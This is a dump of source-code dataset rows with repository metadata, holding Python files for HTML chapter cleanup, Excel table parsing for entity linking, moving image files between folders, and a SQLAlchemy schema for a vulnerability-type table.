        data = re.sub(r"<br><script", "<script", data)
        data = re.sub(r"script><br>", "script>", data)
        if self.getConfig('fix_excess_space', False):
            data = fix_excess_space(data)
        soup = self.make_soup(data)
        story = soup.find('div', {'class':'reading-box'})
        if not story:
            raise exceptions.FailedToDownload(
                "Error downloading Chapter: %s! Missing required element!" % url)
        # Some comments we will get is invalid. Remove them all.
        for comment in story.find_all(text=lambda text:isinstance(text, Comment)):
            comment.extract()
        # Drop links, ad containers and scripts entirely.
        extract_tags = ('a', 'ins', 'script')
        for tagname in extract_tags:
            for tag in story.find_all(tagname):
                tag.extract()
        # Some tags have non-standard tag name; neutralize them to <span>.
        for tag in story.findAll(recursive=True):
            if tag.name not in HTML_TAGS:
                tag.name = 'span'
        return self.utf8FromSoup(url, story)
| 41.587361 | 173 | 0.567802 | true | true | |
1c334bdcd8d7ccf5ba0f8893842db5d53af4e545 | 1,996 | py | Python | LIEGE/database/table.py | seucs/entity-linker | 0156ad9b9d6439ea15518828513da9d9699b9acd | [
"Apache-2.0"
] | 4 | 2018-03-07T07:59:58.000Z | 2019-10-19T09:31:44.000Z | TabEL/database/table.py | acmom/entity-linker | 0156ad9b9d6439ea15518828513da9d9699b9acd | [
"Apache-2.0"
] | null | null | null | TabEL/database/table.py | acmom/entity-linker | 0156ad9b9d6439ea15518828513da9d9699b9acd | [
"Apache-2.0"
] | 2 | 2018-11-05T16:09:07.000Z | 2019-11-07T00:22:37.000Z | #coding=utf8
import xlrd
import xlwt
import json
import sys
reload(sys)
sys.setdefaultencoding('utf8')
class Table:
    """Rectangular grid of cell values with mention-context lookup."""

    def __init__(self, table, row_num, col_num):
        self.table = table
        self.row_num = row_num
        self.col_num = col_num

    def __getitem__(self, i):
        """Return row *i* of the grid."""
        return self.table[i]

    def getMentionContext(self, r, c):
        """Return every other cell sharing row *r* or column *c* with (r, c):
        the column cells (top to bottom) followed by the row cells."""
        column_cells = [self.table[i][c] for i in range(self.row_num) if i != r]
        row_cells = [self.table[r][j] for j in range(self.col_num) if j != c]
        return column_cells + row_cells
class tableManager:
    """Loads an Excel workbook from ../data/ and slices Sheet1 into tables."""
    def __init__(self, filename):
        # Workbooks are looked up relative to the script, in ../data/.
        self.excel = xlrd.open_workbook('..//data//'+filename)
    def getTable(self):
        """Return the list of Table objects stacked vertically on Sheet1.

        Tables are assumed to be separated by blank rows; a table's height is
        found by scanning down column 0 and its width by scanning along its
        first row, stopping at the first empty cell in each direction.
        """
        table = self.excel.sheet_by_name('Sheet1')
        tables = []
        nrows = table.nrows
        ncols = table.ncols
        # Collect cells table by table.  (Original note "按列存储" = "store
        # by column", though cells are actually gathered row by row below.)
        # NOTE(review): scanning starts at row 1, so row 0 appears to be
        # treated as a header/skipped -- confirm against the data files.
        r = 0
        down_flag = False
        while True:
            r += 1
            # Row count of the current table: scan down column 0 until an
            # empty cell or the bottom of the sheet.
            next_r = r
            while True:
                if next_r == nrows:
                    down_flag = True
                    break
                if table.cell(next_r,0).value != '':
                    next_r += 1
                else:
                    break
            # Column count of the current table: scan right along row r
            # until an empty cell or the right edge of the sheet.
            next_c = 0
            while True:
                if next_c == ncols:
                    break
                if table.cell(r,next_c).value != '':
                    next_c += 1
                else:
                    break
            # Copy the table's cells into a plain list-of-rows.
            t = []
            for rr in range(r, next_r):
                row = []
                for cc in range(0,next_c):
                    row.append(table.cell(rr,cc).value)
                t.append(row)
            tables.append(Table(t, next_r - r, next_c))
            if down_flag:
                break
            else:
                # Skip the blank separator row and continue with the next table.
                r = next_r + 1
        return tables
| 24.048193 | 62 | 0.43988 |
import xlrd
import xlwt
import json
import sys
reload(sys)
sys.setdefaultencoding('utf8')
class Table:
    """A rectangular grid of cell values plus its row/column dimensions."""
    def __init__(self, table, row_num, col_num):
        # table: list of rows, each a list of cell values.
        self.table = table
        self.row_num = row_num
        self.col_num = col_num
    def __getitem__(self, i):
        # Index the grid by row.
        return self.table[i]
    def getMentionContext(self, r, c):
        """Return all other cells sharing row *r* or column *c* with (r, c):
        first the column cells (top to bottom), then the row cells."""
        res = []
        for i in range(self.row_num):
            if i == r:
                continue
            res.append(self.table[i][c])
        for j in range(self.col_num):
            if j == c:
                continue
            res.append(self.table[r][j])
        return res
class tableManager:
    """Loads an Excel workbook from ../data/ and slices Sheet1 into tables."""
    def __init__(self, filename):
        # Workbooks are looked up relative to the script, in ../data/.
        self.excel = xlrd.open_workbook('..//data//'+filename)
    def getTable(self):
        """Return the list of Table objects stacked vertically on Sheet1.

        Tables are assumed to be separated by blank rows; a table's height is
        found by scanning down column 0 and its width by scanning along its
        first row, stopping at the first empty cell in each direction.
        NOTE(review): scanning starts at row 1, so row 0 appears to be
        treated as a header/skipped -- confirm against the data files.
        """
        table = self.excel.sheet_by_name('Sheet1')
        tables = []
        nrows = table.nrows
        ncols = table.ncols
        r = 0
        down_flag = False
        while True:
            r += 1
            # Row count of the current table: scan down column 0 until an
            # empty cell or the bottom of the sheet.
            next_r = r
            while True:
                if next_r == nrows:
                    down_flag = True
                    break
                if table.cell(next_r,0).value != '':
                    next_r += 1
                else:
                    break
            # Column count of the current table: scan right along row r
            # until an empty cell or the right edge of the sheet.
            next_c = 0
            while True:
                if next_c == ncols:
                    break
                if table.cell(r,next_c).value != '':
                    next_c += 1
                else:
                    break
            # Copy the table's cells into a plain list-of-rows.
            t = []
            for rr in range(r, next_r):
                row = []
                for cc in range(0,next_c):
                    row.append(table.cell(rr,cc).value)
                t.append(row)
            tables.append(Table(t, next_r - r, next_c))
            if down_flag:
                break
            else:
                # Skip the blank separator row and continue with the next table.
                r = next_r + 1
        return tables
| true | true |
1c334c43ec9647ed0e0ec846ea0ec8b0f1abcbfa | 1,332 | py | Python | movefiles.py | linhailan/JPG-PNG-to-MNIST-NN-Format | c2ff84cb8d2dc6cd49c4d462b4d8ea2ba4620719 | [
"Apache-2.0"
] | null | null | null | movefiles.py | linhailan/JPG-PNG-to-MNIST-NN-Format | c2ff84cb8d2dc6cd49c4d462b4d8ea2ba4620719 | [
"Apache-2.0"
] | null | null | null | movefiles.py | linhailan/JPG-PNG-to-MNIST-NN-Format | c2ff84cb8d2dc6cd49c4d462b4d8ea2ba4620719 | [
"Apache-2.0"
] | null | null | null | import os
from PIL import Image
from array import *
from random import shuffle
import shutil
def move_file(src_path, dst_path, file):
    """Move *file* from *src_path* into *dst_path*.

    The destination directory (including missing parents) is created on
    demand.  Failures are printed rather than raised, preserving the
    original best-effort behaviour so a batch move continues after one
    bad file.
    """
    print("from : ", src_path)
    print("to : ", dst_path)
    try:
        f_src = os.path.join(src_path, file)
        # makedirs+exist_ok replaces the old exists()/mkdir() pair: no
        # check-then-create race, and a missing parent directory no longer
        # makes the move fail.
        os.makedirs(dst_path, exist_ok=True)
        f_dst = os.path.join(dst_path, file)
        shutil.move(f_src, f_dst)
    except Exception as e:
        print("move file ERROR: ", e)
# Load from and save to
def loadfile(Names, limit=50, ext=".jpg"):
    """Move up to *limit* files ending in *ext* from each class directory.

    Names holds [src_root, ...] and [dst_root, ...] entries: every file
    ``Names[0][0]/<class>/*<ext>`` is moved (via move_file) into
    ``Names[1][0]/<class>/``.  The defaults preserve the original
    hard-coded behaviour (50 files, ".jpg").
    """
    src_root = Names[0][0]
    dst_root = Names[1][0]
    for dirname in os.listdir(src_root):
        path = os.path.join(src_root, dirname)
        print(path)
        i = 0
        for filename in os.listdir(path):
            # The cap is checked per file seen (as in the original loop);
            # only matching files advance the counter.
            if i >= limit:
                break
            if filename.endswith(ext):
                print(i, ":", filename)
                move_file(path, os.path.join(dst_root, dirname), filename)
                i += 1
# Summary pass: print the number of entries in every class subdirectory of
# each dataset split (training and test).
Names = [['./training-images','train'], ['./test-images','test']]
for name in Names:
    FileList = []  # NOTE(review): never used in this loop; leftover scaffolding
    for dirname in os.listdir(name[0]):
        path = os.path.join(name[0],dirname)
        # <class dir> : <file count>
        print(path,":",len(os.listdir(path)))
| 25.615385 | 65 | 0.553303 | import os
from PIL import Image
from array import *
from random import shuffle
import shutil
def move_file(src_path, dst_path, file):
    """Best-effort move of *file* from *src_path* into *dst_path*.

    The destination directory is created (non-recursively) when missing;
    any failure is printed rather than raised.
    """
    print("from : ", src_path)
    print("to : ", dst_path)
    try:
        source = os.path.join(src_path, file)
        if not os.path.exists(dst_path):
            os.mkdir(dst_path)
        target = os.path.join(dst_path, file)
        shutil.move(source, target)
    except Exception as e:
        print("move file ERROR: ", e)
def loadfile(Names):
    """Move the first 50 .jpg files of every class folder under Names[0][0]
    into the matching class folder under Names[1][0]."""
    source_root = Names[0][0]
    target_root = Names[1][0]
    for dirname in os.listdir(source_root):
        path = os.path.join(source_root, dirname)
        print(path)
        moved = 0
        for filename in os.listdir(path):
            if moved >= 50:
                break
            if not filename.endswith(".jpg"):
                continue
            print(moved, ":", filename)
            src_dir = os.path.join(source_root, dirname)
            dst_dir = os.path.join(target_root, dirname)
            move_file(src_dir, dst_dir, filename)
            moved += 1
# Summary pass: print the number of entries in every class subdirectory of
# each dataset split (training and test).
Names = [['./training-images','train'], ['./test-images','test']]
for name in Names:
    FileList = []  # NOTE(review): never used in this loop; leftover scaffolding
    for dirname in os.listdir(name[0]):
        path = os.path.join(name[0],dirname)
        # <class dir> : <file count>
        print(path,":",len(os.listdir(path)))
| true | true |
1c334c7a02aa7230afa09f3c7b5da4b74c2bc05b | 1,748 | py | Python | acunetix/v11/db/tables/vuln_types.py | BenDerPan/DScaner | 1552b1877185c08b0db3c48da4e5c3c601c49ce0 | [
"MIT"
] | 20 | 2017-11-09T01:47:56.000Z | 2021-03-08T07:08:10.000Z | acunetix/v11/db/tables/vuln_types.py | BenDerPan/DScaner | 1552b1877185c08b0db3c48da4e5c3c601c49ce0 | [
"MIT"
] | null | null | null | acunetix/v11/db/tables/vuln_types.py | BenDerPan/DScaner | 1552b1877185c08b0db3c48da4e5c3c601c49ce0 | [
"MIT"
] | 6 | 2017-11-09T01:48:01.000Z | 2020-04-06T11:57:05.000Z | # uncompyle6 version 2.13.2
# Python bytecode 3.5 (3351)
# Decompiled from: Python 3.5.3 (default, Jan 19 2017, 14:11:04)
# [GCC 6.3.0 20170118]
# Embedded file name: db\tables\vuln_types.py
__author__ = 'sanyi'
from sqlalchemy import *
from sqlalchemy.orm import mapper
from sqlalchemy.dialects.postgresql import UUID as C_UUID
from sqlalchemy.dialects.postgresql import ARRAY as C_ARRAY
from .tables import metadata
# Mustache template used to render sensor detail blocks: source file/line
# plus an optional raw "additional details" dump.
sensor_details_template = '{{#file}}<p>Source file: <strong class="bb-dark">{{file}}</strong> line: <strong class="bb-dark">{{line}}</strong></p>{{/file}}\n{{#additional}}\n<p>Additional details:</p>\n<code><pre>{{additional}}</pre></code>\n{{/additional}}'
# Schema of the vuln_types table: one row per vulnerability type, keyed by
# vt_id (UUID), with a unique application-level id and indexed search fields.
VulnTypesTable = Table('vuln_types', metadata, Column('vt_id', C_UUID, primary_key=True), Column('app_id', TEXT, index=True, unique=True), Column('name', TEXT, nullable=False, index=True), Column('severity', Integer, nullable=False, index=True), Column('details_template', TEXT), Column('impact', TEXT), Column('description', TEXT), Column('recommendation', TEXT), Column('long_description', TEXT), Column('tags', C_ARRAY(TEXT), index=True), Column('cvss2', TEXT, index=True), Column('cvss3', TEXT, index=True), Column('cvss_score', REAL, index=True), Column('refs', C_ARRAY(TEXT)))
class VulnTypeRow(object):
    """Record object mapped onto ``VulnTypesTable`` by SQLAlchemy.

    Every attribute mirrors a table column and stays None until the mapper
    populates the instance from a database row.
    """
    # identity
    vt_id = None
    app_id = None
    name = None
    # classification / scoring
    severity = None
    tags = None
    cvss2 = None
    cvss3 = None
    cvss_score = None
    # descriptive text
    impact = None
    description = None
    recommendation = None
    long_description = None
    refs = None
    details_template = None

    def __str__(self):
        # !s keeps the original '%s' semantics (plain str() conversion).
        return 'R_vuln_type[{0!s}]={1!s}'.format(self.vt_id, self.name)

    def __repr__(self):
        return str(self)
mapper(VulnTypeRow, VulnTypesTable) | 46 | 582 | 0.699657 |
__author__ = 'sanyi'
from sqlalchemy import *
from sqlalchemy.orm import mapper
from sqlalchemy.dialects.postgresql import UUID as C_UUID
from sqlalchemy.dialects.postgresql import ARRAY as C_ARRAY
from .tables import metadata
sensor_details_template = '{{#file}}<p>Source file: <strong class="bb-dark">{{file}}</strong> line: <strong class="bb-dark">{{line}}</strong></p>{{/file}}\n{{#additional}}\n<p>Additional details:</p>\n<code><pre>{{additional}}</pre></code>\n{{/additional}}'
VulnTypesTable = Table('vuln_types', metadata, Column('vt_id', C_UUID, primary_key=True), Column('app_id', TEXT, index=True, unique=True), Column('name', TEXT, nullable=False, index=True), Column('severity', Integer, nullable=False, index=True), Column('details_template', TEXT), Column('impact', TEXT), Column('description', TEXT), Column('recommendation', TEXT), Column('long_description', TEXT), Column('tags', C_ARRAY(TEXT), index=True), Column('cvss2', TEXT, index=True), Column('cvss3', TEXT, index=True), Column('cvss_score', REAL, index=True), Column('refs', C_ARRAY(TEXT)))
class VulnTypeRow(object):
    """Mapped record class for one row of the ``vuln_types`` table.

    Attribute values default to None and are filled in by the SQLAlchemy
    classical mapper at query time.
    """
    # Column-backed attributes; None until populated from the database.
    vt_id = None
    name = None
    severity = None
    tags = None
    cvss2 = None
    cvss3 = None
    cvss_score = None
    impact = None
    description = None
    recommendation = None
    long_description = None
    refs = None
    details_template = None
    app_id = None
    def __str__(self):
        # Short diagnostic form: R_vuln_type[<vt_id>]=<name>
        return 'R_vuln_type[%s]=%s' % (self.vt_id, self.name)
    def __repr__(self):
        return self.__str__()
mapper(VulnTypeRow, VulnTypesTable) | true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.